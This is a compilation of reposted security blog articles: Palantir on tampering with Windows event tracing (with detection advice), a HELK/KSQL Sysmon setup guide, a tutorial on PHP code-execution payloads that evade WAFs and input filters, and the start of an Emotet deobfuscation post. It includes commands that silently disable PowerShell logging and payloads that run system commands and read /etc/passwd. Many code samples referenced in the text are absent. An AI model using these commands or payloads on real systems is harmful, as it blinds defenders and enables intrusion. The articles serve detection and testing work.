Tampering with Windows Event Tracing: Background, Offense, and Defense

( Original text by Palantir )

Event Tracing for Windows (ETW) is the mechanism Windows uses to trace and log system events. Attackers often clear event logs to cover their tracks. Though the act of clearing an event log itself generates an event, attackers who know ETW well may take advantage of tampering opportunities to cease the flow of logging temporarily or even permanently, without generating any event log entries in the process.

The Windows event log is the data source for many of the Palantir Critical Incident Response Team’s Alerting and Detection Strategies, so familiarity with event log tampering tradecraft is foundational to our success. We continually evaluate our assumptions regarding the integrity of our event data sources, document our blind spots, and adjust our implementation. The goal of this blog post is to share our knowledge with the community by covering ETW background and basics, stealthy event log tampering techniques, and detection strategies.

Introduction to ETW and event logging

The ETW architecture differentiates between event providers, event consumers, and event tracing sessions. Tracing sessions are responsible for collecting events from providers and for relaying them to log files and consumers. Sessions are created and configured by controllers like the built-in logman.exe command line utility. Here are some useful commands for exploring existing trace sessions and their respective ETW providers; note that these must usually be executed from an elevated context.

List all running trace sessions

> logman query -ets
Data Collector Set                Type    Status
Circular Kernel Context Logger Trace Running
AppModel Trace Running
ScreenOnPowerStudyTraceSession Trace Running
DiagLog Trace Running
EventLog-Application Trace Running
EventLog-System Trace Running
LwtNetLog Trace Running
NtfsLog Trace Running
TileStore Trace Running
UBPM Trace Running
WdiContextLog Trace Running
WiFiSession Trace Running
UserNotPresentTraceSession Trace Running
Diagtrack-Listener Trace Running
WindowsUpdate_trace_log Trace Running

List all providers that a trace session is subscribed to

> logman query "EventLog-Application" -ets
Name:                 EventLog-Application
Status: Running
Root Path: %systemdrive%\PerfLogs\Admin
Segment: Off
Schedules: On
Segment Max Size: 100 MB

Name: EventLog-Application\EventLog-Application
Type: Trace
Append: Off
Circular: Off
Overwrite: Off
Buffer Size: 64
Buffers Lost: 0
Buffers Written: 242
Buffer Flush Timer: 1
Clock Type: System
File Mode: Real-time

Name: Microsoft-Windows-SenseIR
Provider Guid: {B6D775EF-1436-4FE6-BAD3-9E436319E218}
Level: 255
KeywordsAll: 0x0
KeywordsAny: 0x8000000000000000 (Microsoft-Windows-SenseIR/Operational)
Properties: 65
Filter Type: 0

Name: Microsoft-Windows-WDAG-Service
Provider Guid: {728B02D9-BF21-49F6-BE3F-91BC06F7467E}
Level: 255
KeywordsAll: 0x0
KeywordsAny: 0x8000000000000000
Properties: 65
Filter Type: 0


Name: Microsoft-Windows-PowerShell
Provider Guid: {A0C1853B-5C40-4B15-8766-3CF1C58F985A}
Level: 255
KeywordsAll: 0x0
KeywordsAny: 0x9000000000000000 (Microsoft-Windows-PowerShell/Operational,Microsoft-Windows-PowerShell/Admin)
Properties: 65
Filter Type: 0

This command details the configuration of the trace session itself, followed by the configuration of each provider that the session is subscribed to, including the following parameters:

  • Name: The name of the provider. A provider only has a name if it has a registered manifest, but it always has a unique GUID.
  • Provider GUID: The unique GUID for the provider. The GUID and/or name of a provider is useful when performing research or operations on a specific provider.
  • Level: The logging level specified. Standard logging levels are: 0 — Log Always; 1 — Critical; 2 — Error; 3 — Warning; 4 — Informational; 5 — Verbose. Custom logging levels can also be defined, but levels 6–15 are reserved. More than one logging level can be captured by ORing respective levels; supplying 255 (0xFF) is the standard method of capturing all supported logging levels.
  • KeywordsAll: Keywords are used to filter specific categories of events. While logging level is used to filter by event verbosity/importance, keywords allow filtering by event category. A keyword corresponds to a specific bit value. All indicates that, for a given keyword matched by KeywordsAny, further filtering should be performed based on the specific bitmask in KeywordsAll. This field is often set to zero. More information on All vs. Any can be found here.
  • KeywordsAny: Enables filtering based on any combination of the keywords specified. This can be thought of as a logical OR where KeywordsAll is a subsequent application of a logical AND. The low 6 bytes refer to keywords specific to the provider. The high two bytes are reserved and defined in WinMeta.xml in the Windows SDK. For example, in event log-related trace sessions, you will see the high byte (specifically, the high nibble) set to a specific value. This corresponds to one or more event channels where the following channels are defined:
0x01 - Admin channel
0x02 - Debug channel
0x04 - Analytic channel
0x08 - Operational channel
  • Properties: This refers to optional ETW properties that can be specified when writing the event. The following values are currently supported (more information here):

From a detection perspective, EVENT_ENABLE_PROPERTY_SID, EVENT_ENABLE_PROPERTY_TS_ID, EVENT_ENABLE_PROPERTY_PROCESS_START_KEY are valuable fields to collect. For example, EVENT_ENABLE_PROPERTY_PROCESS_START_KEY generates a value that uniquely identifies a process. Note that Process IDs are not unique identifiers for a process instance.

  • Filter Type: Providers can optionally choose to implement additional filtering; supported filters are defined in the provider manifest. In practice, none of the built-in providers implement filters as confirmed by running TdhEnumerateProviderFilters over all registered providers. There are some predefined filter types defined in eventprov.h (in the Windows SDK):

Enumerating all registered ETW providers

The logman query providers command lists all registered ETW providers, supplying their name and GUID. An ETW provider is registered if it has a binary manifest stored in the
 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{PROVIDER_GUID} registry key. For example, the Microsoft-Windows-PowerShell provider has the following registry values:

ETW and the event log know how to properly parse and display event information to a user based on binary-serialized information in the WEVT_TEMPLATE resource present in the binaries listed in the ResourceFileName registry value. This resource is a binary representation of an instrumentation manifest (i.e., the schema for an ETW provider). The binary structure of WEVT_TEMPLATE is under-documented, but there are at least two tools available to assist in parsing and recovering event schema, WEPExplorer and Perfview.

Viewing an individual provider

The logman tool prints basic information about a provider. For example:

The listings shows supported keywords and logging values, as well as all processes that are registered to emit events via this provider. This output is useful for understanding how existing trace sessions filter on providers. It is also useful for initial discovery of potentially interesting information that could be gathered from via an ETW trace.

Notably, the PowerShell provider appears to support logging to the event log based on the existence of the reserved keywords in the high nibble of the defined keywords. Not all ETW providers are designed to be ingested into the event log; rather, many ETW providers are intended to be used solely for low-level tracing, debugging, and more recently-developed security telemetry purposes. For example, Windows Defender Advanced Threat Protection relies heavily upon ETW as a supplemental detection data source.

Viewing all providers that a specific process is sending events to

Another method for discovering potentially interesting providers is to view all providers to which events are written from a specific process. For example, the following listing shows all providers relevant to MsMpEng.exe (the Windows Defender service, running as pid 5244 in this example):

Entries listed with GUID are providers lacking a manifest. They will typically be related to WPP or TraceLogging, both of which are beyond the scope of this blog post. It is possible to retrieve provider names and event metadata for these providers types. For example, here are some of the resolved provider names from the unnamed providers above:

  • 05F95EFE-7F75–49C7-A994–60A55CC09571
  • 072665FB-8953–5A85–931D-D06AEAB3D109
  • 7AF898D7–7E0E-518D-5F96-B1E79239484C

Event provider internals

Looking at ETW-replated code snippets in built-in Windows binaries can help you understand how ETW events are constructed and how they surface in event logs. Below, we highlight two code samples, System.Management.Automation.dll (the core PowerShell assembly) and amsi.dll.

System.Management.Automation.dll event tracing

One of the great security features of PowerShell version 5 is scriptblock autologging; when enabled, script content is automatically logged to the Microsoft-Windows-PowerShell/Operational event log with event ID 4104 (warning level) if the scriptblock contains any suspicious terms. The following C# code is executed to generate the event log:

From PowerShell

The LogOperationalWarning method is implemented as follows:

From PowerShell

The WriteEvent method is implemented as follows:

From PowerShell

Finally, the event information is marshaled and EventWriteTransfer is called, supplying the Microsoft-Windows-PowerShell provider with event data.

The relevant data supplied to EventWriteTransfer is as follows:

  • Microsoft-Windows-PowerShell provider GUID: {A0C1853B-5C40-4b15-8766-3CF1C58F985A}
  • Event ID: PSEventId.ScriptBlock_Compile_Detail - 4104
  • Channel value: PSChannel.Operational - 16
    Again, the usage of a channel value indicates that the provider is intended to be used with the event log. The operational channel definition for the PowerShell ETW manifest can be seen here. When an explicit channel value is not supplied, Message Compiler (mc.exe) will assign a default value starting at 16. Since the operational channel was defined first, it was assigned 16.
  • Opcode value: PSOpcode.Create - 15
  • Logging level: PSLevel.Warning - 3
  • Task value: PSTask.CommandStart - 102
  • Keyword value: PSKeyword.UseAlwaysAnalytic - 0x4000000000000000
    This value is later translated to 0 as seen in the code block above. Normally, this event would not be logged but because the Application event log trace session specifies the EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0 Enable flag for all of its providers which will log the event despite a keyword value not being specified.
  • Event data: the scriptblock contents and event fields

Upon receiving the event from the PowerShell ETW provider, the event log service parses the binary WEVT_TEMPLATE schema (original XML schema) and presents human-readable, parsed event properties/fields:

amsi.dll event tracing

You may have observed that Windows 10 has an AMSI/Operational event log that is typically empty. To understand why events are not logged to this event log, you would first have to inspect how data is fed to the AMSI ETW provider (Microsoft-Antimalware-Scan-Interface - {2A576B87-09A7-520E-C21A-4942F0271D67}) and then observe how the Application event log trace session (EventLog-Application) subscribes to the AMSI ETW provider. Let’s start by looking at the provider registration in the Application event log. The following PowerShell cmdlet will supply us with this information:

> Get-EtwTraceProvider -SessionName EventLog-Application -Guid '{2A576B87-09A7-520E-C21A-4942F0271D67}'
SessionName     : EventLog-Application
Guid : {2A576B87-09A7-520E-C21A-4942F0271D67}
Level : 255
MatchAnyKeyword : 0x8000000000000000
MatchAllKeyword : 0x0

The following properties should be noted:

  • Operational channel events (as indicated by 0x8000000000000000 in the MatchAnyKeyword value) are captured.
  • All logging levels are captured.
  • Events should be captured even if an event keyword value is zero as indicated by the EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0 flag.

This information on its own does not explain why AMSI events are not logged, but it supplies needed context upon inspecting how amsi.dll writes events to ETW. By loading amsi.dl into IDA, we can see that there was a single call to the EventWrite function within the internal CAmsiAntimalware::GenerateEtwEvent function:

The relevant portion of the call to EventWrite is the EventDescriptorargument. Upon applying the EVENT_DESCRIPTOR structure type to _AMSI_SCANBUFFER, the following information was interpreted:

The EVENT_DESCRIPTOR context gives us the relevant information:

  • Event ID: 1101 (0x44D)
    This events details can be extracted from a recovered manifest as seen here.
  • Channel: 16 (0x10) referring to the operational event log channel
  • Level: 4 (Informational)
  • Keyword: 0x8000000000000001 (AMSI/Operational OR Event1). These values are interpreted by running the logman query providers Microsoft-Antimalware-Scan-Interface command.

We now understand that 1101 events not logged to the Application event log because it only considers events where the keyword value matches 0x8000000000000000. In order to fix this issue and get events pumping into the event log, either the Application event log trace session would need to be modified (not recommended and requires SYSTEM privileges) or you could create your own persistent trace session (e.g., an autologger) to capture AMSI events in the event log. The following PowerShell script creates such a trace session:

$AutoLoggerGuid = "{$((New-Guid).Guid)}"
New-AutologgerConfig -Name MyCustomAutoLogger -Guid $AutoLoggerGuid -Start Enabled
Add-EtwTraceProvider -AutologgerName MyCustomAutoLogger -Guid '{2A576B87-09A7-520E-C21A-4942F0271D67}' -Level 0xff -MatchAnyKeyword 0x80000000000001 -Property 0x41

After running the above command, reboot, and the AMSI event log will begin to populate.

Some additional reverse engineering showed that the scanResult field refers to the AMSI_RESULT enum where, in this case, 32768 maps to AMSI_RESULT_DETECTED, indicating that the buffer (the Unicode encoded buffer in the content field) was determined to be malicious.

Without knowledge of ETW internals, a defender would not have been able to determine that additional data sources (the AMSI log in this case) can be fed into the event log. One would have to resort to speculation as to how the AMSI event became to be misconfigured and whether or not the misconfiguration was intentional.

ETW tampering techniques

If the goal of an attacker is to subvert event logging, ETW provides a stealthy mechanism to affect logging without itself generating an event log trail. Below is a non-exhaustive list of tampering techniques that an attacker can use to cut off the supply of events to a specific event log.

Tampering techniques can generally be broken down into two categories:

  1. Persistent, requiring reboot — i.e., a reboot must occur before the attack takes effect. Changes can be reverted, but would require another reboot. These attacks involve altering autologger settings — persistent ETW trace sessions with settings in the registry. There are more types of persistent attacks than ephemeral attacks, and they are usually more straightforward to detect.
  2. Ephemeral — i.e., where the attack can take place without a reboot.

Autologger provider removal

Tampering category: Persistent, requiring reboot
Minimum permissions required: Administrator
Detection artifacts: Registry key deletion: HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID}

Description: This technique involves the removal of a provider entry from a configured autologger. Removing a provider registration from an autologger will cause events to cease to flow to the respective trace session.
Example: The following PowerShell code disables Microsoft-Windows-PowerShell event logging:

Remove-EtwTraceProvider -AutologgerName EventLog-Application -Guid '{A0C1853B-5C40-4B15-8766-3CF1C58F985A}'

In the above example, A0C1853B-5C40-4B15-8766-3CF1C58F985A refers to the Microsoft-Windows-PowerShell ETW provider. This command will end up deleting the HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\{a0c1853b-5c40-4b15-8766-3cf1c58f985a} registry key.

Provider “Enable” property modification

Tampering category: Persistent, requiring reboot
Minimum permissions required: Administrator
Detection artifacts: Registry value modification: HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID} - EnableProperty (REG_DWORD)

Description: This technique involves alerting the Enable keyword of an autologger session. For example, by default, all ETW provider entries in the EventLog-Application autologger session are set to 0x41 which translates to EVENT_ENABLE_PROPERTY_SID and EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0 is not documented; it specifies that any events generated for a provider should be logged even if the keyword value is set to 0. An attacker could swap out EVENT_ENABLE_PROPERTY_ENABLE_KEYWORD_0 for EVENT_ENABLE_PROPERTY_IGNORE_KEYWORD_0, resulting in a value of 0x11, which would result in all events where the keyword is 0 to not be logged. For example, PowerShell eventing supplies a 0 keyword value with its events, resulting in no logging to the PowerShell event log.

Example: The following PowerShell code disables Microsoft-Windows-PowerShell event logging:

Set-EtwTraceProvider -Guid '{A0C1853B-5C40-4B15-8766-3CF1C58F985A}' -AutologgerName 'EventLog-Application' -Property 0x11

In the above example, A0C1853B-5C40-4B15-8766-3CF1C58F985A refers to the Microsoft-Windows-PowerShell ETW provider. This command will end up setting HKLM\System\CurrentControlSet\Control\WMI\Autologger\EventLog-Application\{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\EnableProperty to 0x11. Upon rebooting, events will cease to be reported to the PowerShell event log.
An attacker is not constrained to using just the Set-EtwTraceProvider cmdlet to carry out this attack. An attacker could just modify the value directly in the registry. Set-EtwTraceProvider offers a convenient autologger configuration abstraction.

Alternative detection artifacts/ideas: If possible, it is advisable to monitor for modifications of values within the HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID} registry key. Note that modifying EnableProperty is just one specific example and that an attacker can alter ETW providers in other ways, too.

ETW provider removal from a trace session

Tampering category: Ephemeral
Minimum permissions required: SYSTEM
Detection artifacts: Unfortunately, no file, registry, or event log artifacts are associated with this event. While the technique example below indicates that logman.exe was used to perform the attack, an attacker can obfuscate their techniques by using Win32 APIs directly, WMI, DCOM, PowerShell, etc.
Description: This technique involves removing an ETW provider from a trace session, cutting off its ability to supply a targeted event log with events until a reboot occurs, or until the attacker restores the provider. While an attacker must have SYSTEM privileges to perform this attack, it is unlikely that defenders will notice such an attack if they rely on event logs for threat detection.
Example: The following PowerShell code immediately disables Microsoft-Windows-PowerShell event logging until a reboot occurs or the attacker restores the ETW provider:

logman update trace EventLog-Application --p Microsoft-Windows-PowerShell -ets

Alternative detection artifacts/ideas:

  • Event ID 12 within the Microsoft-Windows-Kernel-EventTracing/Analytic log indicates when a trace session is modified, but it doesn’t supply the provider name or GUID that was removed, so it would be difficult to confidently determine whether or not something suspicious occurred using this event.
  • There have been several references thus far to the ETW PowerShell cmdlets housed in the EventTracingManagement module, which itself is a CDXML-based module. This means that all the cmdlets in the EventTracingManagement are backed by WMI classes. For example, the Get-EtwTraceProvider cmdlet is backed by the ROOT/Microsoft/Windows/EventTracingManagement:MSFT_EtwTraceProviderclass. Considering ETW providers can be represented in the form of WMI class instances, you could craft a permanent WMI event subscription that logs all provider removals from a specific trace session to the event log. This code sample creates an NtEventLogEventConsumer instance that logs event ID 8 to the Application event log (source: WSH) any time a provider is removed from the Application event log trace session, EventLog-Application. The logged event looks like the following:
  • The frequency at which providers are removed from Application event logs in large environments is not currently known. As as fallback, it is still advised to log the execution of logman.exewpr.exe, and PowerShell in your environment.


Identifying blind spots and assumptions in Alerting and Detection Strategies is a crucial step in ensuring the resilience of detections. Since ETW is at the core of the event logging infrastructure, gaining an in-depth understanding of ETW tampering attacks is a valuable way to increase the integrity of security-related data sources.

Further Reading


Real-Time Sysmon Processing via KSQL and HELK — Part 1: Initial Integration

( Original text by Roberto Rodriguez )

During a recent talk titled “Hunters ATT&CKing with the Right Data” that I gave with my brother Jose Luis Rodriguez @Cyb3rPandaH at ATT&CKcon, we talked about the importance of documenting and modeling security event logs before developing any data analytics while preparing for a threat hunting engagement. Defining relationships among Windows security event logs such as Sysmon, for example, helped us to appreciate the extra context that two or more events together can provide for a hunt. Therefore, I was wondering if there was anything that I could do with my project HELK to apply some of the relationships presented in our talk, and enrich the data collected from my endpoints in real-time.

This post is part of a three-part series. In this first one, I will introduce the initial integration of a new application named KSQL to the HELK ecosystem in order to enable a SQL interface for stream processing on the top of the Kafka platform already provided by HELK. On the other two posts, I will go over a basic example of a JOINstatement with Sysmon Event ID 1 (Process Creation) and Sysmon Event ID 3 (Network Connection), and show you how useful it could be during a hunting engagement. The other two parts can be found in the following links:

What is KSQL?

KSQL is the open source streaming SQL engine for Apache Kafka®. It provides an easy-to-use yet powerful interactive SQL interface for stream processing on Kafka, without the need to write code in a programming language such as Java or Python. KSQL is scalable, elastic, fault-tolerant, and real-time. It supports a wide range of streaming operations, including data filtering, transformations, aggregations, joins, windowing, and sessionization.

KSQL is implemented on the top of the Kafka Streams API which means that KSQL queries are compiled via Kafka Streams applications.

What is “Kafka Streams”?

Kafka Streams is a JVM client library to develop stream processing applications that leverage data stored in Kafka clusters. Remember that stream processing applications do not run inside of Kafka nodes. Instead, Kafka Streams applications read from topics available in Kafka nodes, process the data on their own internal stream processors, and write the results back to the same or new topic in the Kafka cluster.

This concept is what makes KSQL flexible and easy to use with current Kafka cluster deployments.

What is a Stream?

stream is the most important abstraction provided by Kafka Streams: it represents an unbounded, continuously updating data set, where unbounded means “of unknown or of unlimited size”

Think of a stream as a sequence of data records ordered by time in a key-value format that can be queried for further analysis. One example could be messages from a Kafka topic that stores information about process creationsof specific endpoints in your network as shown below.

KSQL: SQL interface for stream processing?

Essentially, KSQL allows you to easily execute SQL-like queries on the top of streams flowing from Kafka topics. KSQL queries get translated to Java code via the Kafka Streams API reducing the complexity of writing several lines of Java code for real-time streaming processing. Our basic design then would look like the following:


Now that we have gained some understanding of KSQL, let’s define one of the SQL capabilities provided by KSQL that will be helpful for this post, a SQL JOINKSQL join operations merge streams and/or tables on common data key values producing new streams or tables in real-time.

Streams vs Tables

Once again, streams are never-ending sequence of data records ordered by time that represent the past and the present state of data ingested to a Kafka topic. One can access a stream from the beginning of its time all the way to the recent recorded values. Tables on the other hand, represent only the up to date state of data records. For example, if DHCP logs are being collected, you can have a table that keeps the most up to date mapping between an IP address and a domain computer in your environment. Meanwhile, you can query the DHCP logs stream and access past IP addresses assigned to workstations in your network.

According to the Confluent Developers Guide, you can join streams and tables in the following way:


Inner Join: It returns data records that have matching values in both sources

Left Outer Join: It returns data records from the left source and the matched data records from the right source

Full Outer Join: It returns data records when there is a match in either left or right source

I hope this small review of KSQL and the concepts around Kafka Streams were helpful to get you familiarized with the technology being added to the HELK.

Why KSQL and HELK?

As I mentioned at the beginning of this post, I wanted to find a way to enrich Windows Sysmon event logs by applying the relationships identified within the information it provides. From an infrastructure perspective, I already collect Sysmon event logs from my Windows endpoints and publish them directly to a Kafka topic named winlogbeat in HELK. Therefore, after what we just learned about KSQL, it will be very easy to use it with the current HELK Kafka deployment and apply a Sysmon data model via join operations in real-time.

What is a data model?

A data model in general determines the structure of data objects present in a data set and the relationships identified among each other. From a security events perspective, data objects can be entities provided in event logs such as a “User”, a “Host”,a “Process”, a “File” or even an “IP address”. As any other data object, they also have properties such as “user_name”, “host_name”, “process_name” or “file_name”, and depending on the information provided by each event log, relationships can be defined among those data objects as shown below:

Modeling data objects identified in security event logs help security analysts to identify the right data sources and correlations that can be used for the development of data analytics.

What is the “Sysmon Data Model”?

Windows Sysmon event logs provide information about several data objects such as “Processes”, “IP Addresses”, “Files”, “Registry Keys”, and even “Named Pipes”. In addition, most of their data objects have a common property named ProcessGUID that defines direct relationships among specific Sysmon events. According to my teammates Matt Graeber and Lee Christensen, in their recent white paper “Subverting Sysmon”, the ProcessGUID is a unique value derived from the machine GUID, process start time, and process token ID that can be used to correlate other related events. After documenting the relationships among Sysmon events and data objects based on their ProcessGUID property, the following data model is possible:

As we already know, KSQL join operations happen on common unique data key values. Therefore, the ProcessGUID property can be used to join Sysmon events. For the purpose of this post, we will join ProcessCreate (Event ID 1) and NetworkConnect (Event ID 3) events.

HELK and KSQL Integration

KSQL was developed as part of the Confluent platform, and it can be distributed via docker images available on DockerHub. HELK is deployed via docker images as a proof of concept, so having docker images for KSQL works perfectly. The two docker images that I added to the HELK ecosystem are the following ones:

  • Cp-ksql-server Image: It includes the ksql-server package which runs the engine that executes KSQL queries.
  • Cp-ksql-cli Image: It includes the ksql-cli package which acts as a client to the KSQL server which allows researchers to interactively pass KSQL queries to the KSQL server. This one is added to the HELK just for testing purposes. The KSQL server can run independently with predefined SQL queries files.

For this blog post, we will need the following:

  • An Ubuntu box hosting the latest HELK build
  • A Windows 10 System with Sysmon installed
  • Winlogbeat installed on the Windows 10 and shipping logs to HELK

Deploying KSQL via HELK

Clone the HELK to your Ubuntu box, and change your directory to docker as shown below:

git clone https://github.com/Cyb3rWard0g/HELK.git
cd HELK/docker

Run the helk_install.sh script to install and run the HELK docker images. You can just go with all the default options and run the basic HELK deployment which comes with both KSQL server and KSQL CLI containers.

sudo ./helk_install.sh

If you want to monitor your HELK installation, you can open another console, and run the following commands:

tail -f /var/log/helk-install.log

Once the installation finishes, you should see the following on your main screen:

Run the following commands to see if your containers are running:

sudo docker ps

Launch KSQL CLI interface

You are now ready to start using KSQL. We will use KSQL via its command line interface (CLI) to connect to the helk-ksql-server container and send KSQL queries to it. Run the following command to access the helk-ksql-clicontainer and establish a connection to the helk-ksql-server container:

sudo docker exec -ti helk-ksql-cli ksql http://helk-ksql-server:8088

A KSQL CLI banner will show up, and you will be able to use the KSQL CLI

Inspect the KSQL Server Properties

You can now start by checking the properties assigned to the KSQL server by running the following commands:


The information above confirms that the helk-kafka-broker is part of the ksql.streams.bootstrap.servers. Therefore, we will able to execute KSQL queries on the topics available in the Kafka broker.

Check Available Kafka Topics

We can check the metadata of topics available on ur helk-kafka-broker with the SHOW TOPICS command.


What the HELK is going on so far?

Up to this point, we have all we need to start using KSQL on the top of the HELK project. The following is happening:

  • HELK’s Kafka broker with topic winlogbeat running
  • KSQL Server is running and configured to read from the Kafka topic named winlogbeat
  • KSQL CLI is running and configured to talk to KSQL Server and send interactive queries
  • Your Ubuntu box hosting the HELK has an interactive connection to the helk-ksql-cli container
  • HELK is waiting for Windows Sysmon logs to be published

Get Sysmon Data to HELK

You can now install Sysmon and Winlogbeat following the initial instructions in this post. The following binary versions and configurations are recommended:

Sysmon V8.04

Winlogbeat V6.5.3

Remember to start the winlogbeat service to start sending logs to the HELK Kafka broker as shown in the image below:

Check Winlogbeat Shipping Logs

You can check if the logs being collected by the Winlogbeat Shipper are being published to your HELK Kafka broker by running the following command on your Windows endpoint:

winlogbeat.exe -e

Check Logs Published to Kafka Topics

You can also inspect messages making it to the Kafka topic winlogbeat with the PRINT command as shown below:

ksql> PRINT ‘winlogbeat’;

We can confirm that data is flowing from our Windows system to our HELK Kafka broker, and through our KSQL Server.

I hope this first post helped you to get familiarized with the basic concepts of KSQL, and showed you how easy it is to use it with the latest version of HELK. In the next post, I will show you how to use KSQL in order to start joining Sysmon events 1 and 3 in real-time. The Sysmon-Join KSQL Recipe will be shared for you to try it.



How To Exploit PHP Remotely To Bypass Filters & WAF Rules

( Original text by Andrea Menin )

In the last three articles, I’ve been focused on how to bypass WAF rule set in order to exploit a remote command execution. In this article, I’ll show you how many possibilities PHP gives us in order to exploit a remote code execution bypassing filters, input sanitization, and WAF rules. Usually when I write articles like this one people always ask “really people write code like this?” and typically they’re not pentesters. Let me answer before you ask me again : YES and YES.

This is the first of two vulnerable PHP scripts that I’m going to use for all tests. This script is definitely too easy and dumb but it’s just to reproducing a remote code execution vulnerability scenario (probably in a real scenario, you’ll do a little bit more work to reach this situation):

first PHP script

Obviously, the sixth line is pure evil. The third line tries to intercept functions like systemexec or passthru (there’re many other functions in PHP that can execute system commands but let’s focus on these three). This script is running in a web server behind the CloudFlare WAF (as always, I’m using CloudFlare because it’s easy and widely known by the people, this doesn’t mean that CloudFlare WAF is not secure. All other WAF have the same issues, more or less…). The second script will be behind ModSecurity + OWASP CRS3.

Trying to read /etc/passwd

For the first test, I try to read /etc/passwd using system() function by the request /cfwaf.php?code=system(“cat /etc/passwd”);

CloudFlare WAF blocks my first try

As you can see, CloudFlare blocks my request (maybe because the “/etc/passwd”) but, if you have read my last article about uninitialized variable, I can easily bypass with something like cat /etc$u/passwd

CloudFlare WAF bypassed but input sanitization blocks the request

CloudFlare WAF has been bypassed but the check on the user’s input blocked my request because I’m trying to use the “system” function. Is there a syntax that let me use the system function without using the “system” string? Let’s take a look at the PHP documentation about strings!

PHP String escape sequences

\[0–7]{1,3} sequence of characters in octal notation, which silently overflows to fit in a byte (e.g. “\400” === “\000”)

\x[0–9A-Fa-f]{1,2} sequence of characters in hexadecimal notation (e.g. “\x41″)

\u{[0–9A-Fa-f]+} sequence of Unicode codepoint, which will be output to the string as that codepoint’s UTF-8 representation (added in PHP 7.0.0)

Not everyone knows that PHP has a lot of syntaxes for representing a string, and with the “PHP Variable functions” it becomes our Swiss Army knife for bypassing filters and rules.

PHP Variable functions

PHP supports the concept of variable functions. This means that if a variable name has parentheses appended to it, PHP will look for a function with the same name as whatever the variable evaluates to, and will attempt to execute it. Among other things, this can be used to implement callbacks, function tables, and so forth.

this means that syntaxes like $var(args); and “string”(args); are equal to function(args);. If I can call a function by using a variable or a string, it means that I can use an escape sequence instead of the name of a function. Here an example:

the third syntax is an escape sequence of characters in a hexadecimal notation that PHP converts to the string “system” and then it converts to the function system with the argument “ls”. Let’s try with our vulnerable script:

user input sanitization bypassed

This technique doesn’t work for all PHP functions, variable functions won’t work with language constructs such as echoprintunset()isset()empty()includerequire and the like. Utilize wrapper functions to make use of any of these constructs as variable functions.

Improve the user input sanitization

What happens if I exclude characters like double and single quotes from the user input on the vulnerable script? Is it possible to bypass it even without using double quotes? Let’s try:

prevent using “ and ‘ on $_GET[code]

as you can see on the third line, now the script prevents the use of  and  inside the $_GET[code] querystring parameter. My previous payload should be blocked now:

Now my vulnerable script prevents using “

Luckily, in PHP, we don’t always need quotes to represent a string. PHP makes you able to declare the type of an element, something like $a = (string)foo; in this case, $a contains the string “foo”. Moreover, whatever inside round brackets without a specific type declaration, is treated as a string:

In this case, we’ve two ways to bypass the new filter: the first one is to use something like (system)(ls); but we can’t use “system” inside the code parameter, so we can concatenate strings like (sy.(st).em)(ls);. The second one is to use the $_GETvariable. If I send a request like ?a=system&b=ls&code=$_GET[a]($_GET[b]); the result is: $_GET[a] will be replaced with the string “system” and $_GET[b] will be replaced with the string “ls” and I’ll able to bypass all filters!

Let’s try with the first payload (sy.(st).em)(whoami);

WAF bypassed, filter bypassed

and the second payload ?a=system&b=cat+/etc&c=/passwd&code=$_GET[a]($_GET[b].$_GET[c]);

WAF bypassed, filter bypassed

In this case is not useful, but you can even insert comments inside the function name and inside the arguments (this could be useful in order to bypass WAF Rule Set that blocks specific PHP function names). All following syntaxes are valid:


This PHP function returns a multidimensional array containing a list of all defined functions, both built-in (internal) and user-defined. The internal functions will be accessible via $arr[“internal”], and the user-defined ones using $arr[“user”]. For example:

This could be another way to reach the system function without using its name. If I grep for “system” I can discover its index number and use it as a string for my code execution:

1077 = system

obviously, this should work against our CloudFlare WAF and script filters:

bypass using get_defined_functions

Array of characters

Each string in PHP can be used as an array of characters (almost like Python does) and you can refer to a single string character with the syntax $string[2] or $string[-3]. This could be another way to elude rules that block PHP functions names. For example, with this string $a=”elmsty/ “; I can compose the syntax system(“ls /tmp”);

If you’re lucky you can find all the characters you need inside the script filename. With the same technique, you can pick all chars you need with something like (__FILE__)[2]:


Let me say that with the OWASP CRS3 all becomes harder. First, with the techniques seen before I can bypass only the first paranoia level, and this is amazing! Because the Paranoia Level 1 is just a little subset of rules of what we can find in the CRS3, and this level is designed for preventing any kind of false positive. With a Paranoia Level 2 all things becomes hard because of the rule 942430 “Restricted SQL Character Anomaly Detection (args): # of special characters exceeded”. What I can do is just execute a single command without arguments like “ls”, “whoami”, etc.. but I can’t execute something like system(“cat /etc/passwd”) as done with CloudFlare WAF:

Previous Episodes

Web Application Firewall Evasion Techniques #1

Web Application Firewall Evasion Techniques #2

Web Application Firewall Evasion Techniques #3

Deobfuscating Emotet’s powershell payload

( Original text by malfind )

Emotet is a banking trojan, targeting computer users since around 2014. During that time it has changed its structure a lot. Lately we see massive emotet spam campaigns, using multiple phishing methods to bait users to download and launch a malicious payload, usually in the form of a weaponized Word document.

Emotet's chain of infection
Emotet’s chain of infection

First user receives a fake e-mail, trying to persuade him to click on the link, where the weaponized doc is being downloaded. Document is then trying to trick user to enable content and allow macros in order to launch embedded VBA code. VBA is obfuscated. We can also deobfuscate it, but in the end it launches a powershell command. Let’s skip VBA deobuscation today, as I want to focus on powershell. We can obtain powershell command launched by VBA code without deobfuscation, by using any sandbox with powershell auditing.

Typical Emotet document

The powershell code itself is obfuscated as well. The problem with just launching it in the virtual environment is that we probably won’t see every network IoC this way. Of course there are ways to do it (just block dns requests, and malware should try every fail-over domain), but in my opinion if there is time to do it – it is always better to deobfuscate code to better understand it.

Obfuscation is a way to make a malicious code unreadable. It has two purposes. First to trick antivirus signatures, second to make analysis of the code harder and more time-consuming.

In this post, I want to show three ways of obfuscation used by Emotet malware since December 2017.

1. String replace method

This method uses multiple powershell’s “replace” operators to swap a bunch of junk strings with characters that in the end produce a valid powershell code

Example 1. Code obfuscated with replace string method

